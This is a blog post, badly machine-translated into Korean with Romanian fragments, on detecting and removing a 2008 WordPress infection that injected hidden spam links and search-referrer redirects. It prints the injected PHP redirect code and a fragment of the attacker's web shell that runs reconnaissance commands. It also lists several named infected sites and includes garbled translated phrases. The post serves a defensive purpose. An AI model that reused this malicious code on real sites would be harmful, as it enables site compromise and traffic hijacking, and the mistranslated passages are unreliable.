지난달에는 계속해서 경고를 받았어요. 블로그의 바이러스 일부 방문자로부터. 처음에는 꽤 좋은 바이러스 백신이 설치되어 있었기 때문에 경고를 무시했습니다(카스퍼스키 AV 2009) 그리고 블로그에서 오랜 시간을 보냈음에도 불구하고 바이러스 경고를 받지 못했습니다(.. 얼마 전에 의심스러운 것을 보았는데 첫 번째 새로 고침에서 사라졌습니다. 마침내...).
천천히, 천천히, 큰 변화가 나타나기 시작했어요 방문자 트래픽, 그 이후로 최근 트래픽이 지속적으로 감소하고 있으며, 이에 대해 말하는 사람들이 점점 많아지기 시작했습니다. StealthSettings.com 그것은 바이러스. 어제 누군가로부터 바이러스 백신이 차단했을 때 찍은 스크린샷을 받았습니다. 스크립트 Stealthsettings.com에서 :Trojan-Clicker.HTML.IFrame.gr. A fost destul de convingator pentru mine, incat sa ma pun pe cautat in toate sursele. Prima idee care mi-a venit in minte, a fost sa fac 치받이 la ultima versiune de WordPress (2.5.1), dar nu inainte de a sterge toate fisierele vechiului script de WordPress si de a face backup la baza de date. Procedura asta nu a dat niciun rezultat si probabil ar mai fi durat mult timp ca sa-mi dau sema unde e buba, daca nu mi-ar fi spus 유겐 intr-o discutie la cafea, ca a gasit un link pe Google si ar fi bine sa-l vad.
MyDigitalLife.info, au publicat un articol cu titlul : “WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Your-Needs.info, AnyResults.Net, Golden-Info.net and Other Illegal Sites” 이것이 제가 필요로 했던 스레드의 끝입니다.
그것은 약 악용하다 쿠키 기반 WordPress 제공, 제 생각에는 매우 복잡하고 책에 따라 만들어졌습니다. 하나 만들 만큼 똑똑하다 SQL 주입 블로그 데이터베이스에서, 보이지 않는 사용자를 생성하려면 간단한 일상 점검부터 계기반->사용자, 서버의 "쓰기 가능한" 디렉터리와 파일을 확인하려면 (chmod 777 있음) 검색 및 실행하다 그룹 또는 루트 권한이 있는 파일. 나는 익스플로잇의 이름을 모르고 루마니아를 포함하여 감염된 블로그가 많다는 사실에도 불구하고 이에 대해 작성된 기사가 거의 없다는 것을 알았습니다. 좋습니다... 저는 이 바이러스에 대한 일반성을 설명하려고 노력하겠습니다.

바이러스는 무엇을 하는가?

우선, 블로그 페이지 소스에 방문자에게는 보이지 않는 링크를 삽입하지만 검색 엔진, 특히 Google에서는 볼 수 있고 색인 생성이 가능합니다. 이런 식으로 공격자가 지정한 사이트로 페이지 순위를 이전합니다.. 두 번째로 하나 더 삽입됩니다. 리디렉션 코드 URL: Google, Live, Yahoo 등 또는 RSS 리더를 통해 방문했지만 해당 사이트가 없는 방문자를 위한 것입니다. 매력적인 여자. 그리고 바이러스 백신 이 리디렉션을 다음과 같이 감지합니다. Trojan-Clicker.HTML.

증상:

방문자 트래픽 대폭 감소특히 대부분의 방문자가 Google을 통해 유입되는 블로그에서는 더욱 그렇습니다.

식별하다: (이것은 phpmyadmin, php 및 linux에 대해 잘 모르는 사람들에게는 문제가 복잡해지는 곳입니다)

그만큼. 주의 깊은!!! 먼저 데이터베이스 백업을 만드세요!!!

1. 파일 소스를 확인하세요 index.php, 헤더.php, 바닥글.php, 블로그 주제에서 암호화를 사용하는 코드가 있는지 확인하세요. 베이스64 또는 "if($ser=="1? && sizeof($_COOKIE)==0)” 형식으로:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

...또는 비슷한 것. 이 코드를 삭제하세요!

상상해 보세요…

위 스크린샷에서는 실수로 '를 선택했습니다.<?php get_header(); ?>해당 코드는 그대로 유지되어야 합니다.

2. 사용 phpmyadmin 데이터베이스의 테이블로 이동합니다. wp_users, 이름이 없는 사용자가 있는지 확인하는 곳 00:00:00 0000-00-00 (현장에서는 가능합니다. user_login "워드프레스"라고 쓰세요. 해당 사용자의 ID(ID 필드)를 적어둔 후 삭제하세요.

상상해 보세요…

*녹색선의 ID는 삭제 후 보관해야 합니다. 그의 경우 졸린, ID=8이었습니다 .

3. 테이블로 이동 wp_usermeta, 당신이해야 할 곳 위치한 당신은 삭제 ID와 관련된 줄(필드의 위치 user_id 삭제된 ID의 값이 나타납니다.)

4. 테이블에서 wp_option, 들어가다 active_plugins 어떤 플러그인이 의심스럽게 활성화되었는지 확인하세요. 다음과 같은 엔딩을 사용할 수 있습니다. _old.giff, _old.pngg, _old.jpeg, _new.php.giff등. 가짜 이미지 확장자와 _old 및 _new의 조합.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

이 플러그인을 삭제한 다음 블로그로 이동하세요.> 대시보드 –> 플러그인: 특정 플러그인을 비활성화하고 활성화합니다.

이미지를 클릭하시면 감염된 파일이 active_plugins에 어떻게 나타나는지 확인하실 수 있습니다.

active_plugins에 표시된 FTP 또는 SSH 경로를 따라 서버에서 파일을 삭제하세요.

5. 또한 phpMyAdmin의 테이블에 wp_option, "가 포함된 줄을 찾아서 삭제하세요.rss_f541b3abd05e7962fcab37737f40fad8"그리고 돌아서"내부_링크_캐시”.
Internal_links_cache에는 블로그에 나타나는 스팸 링크와 구글 애드센스 코드, 해커의.

6. 다음을 수행하는 것이 좋습니다. 비밀번호 변경 블로그에 로그인하는 것 등등 의심스러운 사용자를 모두 제거하세요. 최신 버전의 WordPress로 업그레이드하고 더 이상 신규 사용자 등록을 허용하지 않도록 블로그를 설정하세요. 손실은 없습니다. 로그인하지 않은 사람이라도 댓글을 달 수 있습니다.

나는 위에서 이 상황에서 블로그를 이 바이러스로부터 청소하기 위해 얼마나 많은 일을 해야 하는지 설명하려고 노력했습니다. 문제는 보이는 것보다 훨씬 더 심각하며 해결이 멀지 않습니다. 보안 취약점 블로그가 있는 호스팅 웹서버의

첫 번째 보안 조치로 액세스 권한이 있는 사람은 SSH, *_old* 및 *_new.*와 같은 파일이 로 끝나는지 서버에서 몇 가지 검사를 수행합니다.gif, .jpeg, .pngg, .jpgg. 이러한 파일은 삭제해야 합니다. 파일 이름을 바꾸는 경우, 예를 들어 top_right_old.gif ~에 top_right_old.php, 파일에 정확히 서버 익스플로잇 코드가 포함되어 있음을 알 수 있습니다.

서버 확인, 청소 및 보안에 대한 몇 가지 유용한 힌트입니다. (SSH를 통해)

1. CD /tmp 그런 폴더가 있는지 확인하십시오 tmpVFlma 또는 기타 유사한 이름 조합을 사용하여 삭제하세요. 아래 스크린샷에서 이러한 두 개의 폴더를 볼 수 있습니다.

rm –rf 번호 폴더

2. 속성이 있는 폴더를 최대한 확인하고 제거(chmod 변경)합니다. chmod 777

현재 디렉토리에서 쓰기 가능한 모든 파일을 찾으십시오. 찾다 . -유형 f -perm -2 -ls
현재 디렉토리에서 쓰기 가능한 모든 디렉토리를 찾으십시오. 찾다 . -유형 d -perm -2 -ls
현재 디렉토리에서 쓰기 가능한 모든 디렉토리와 파일을 찾으십시오. 찾다 . -perm -2 –ls

3. 서버에서 의심스러운 파일을 찾아보세요.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, 주의 깊은!!! 비트를 설정하는 파일에 남쪽 그리고 홍어. 이러한 파일은 파일을 실행하는 사용자의 권한이 아닌 사용자(그룹) 또는 루트 권한으로 실행됩니다. 보안 문제가 있는 경우 이러한 파일은 루트 손상으로 이어질 수 있습니다. SUID 및 SGID 비트가 포함된 파일을 사용하지 않는 경우 "chmod 0” 해당 항목을 삭제하거나 해당 항목이 포함된 패키지를 제거하세요.

익스플로잇에는 소스 어딘가에 다음이 포함되어 있습니다.

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

...실질적으로 이런 방식으로 그는 보안 침해를 찾아냅니다. 그룹/루트 권한으로 포트, "쓰기 가능한" 디렉터리 및 파일 실행을 엽니다.

자세한 내용을 가지고 돌아오겠습니다...

일부 감염된 블로그: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... 그리고 목록은 계속될 수 있습니다 ... 많이.

Google 검색 엔진을 사용하여 블로그가 감염되었는지 확인할 수 있습니다. 복사 & 반죽 :

사이트:www.blegoo.com 구매

잘 자고 수고했어요 ;) 곧 Eugen이 prevezibil.imprevizibil.com에서 소식을 가지고 올 것 같아요.

brb :)

LA: ATENTIE! Schimbarea temei de WordPress sau upgrade-ul la WordPress 2.5.1, NU reprezinta o solutie pentru a scapa de acest virus.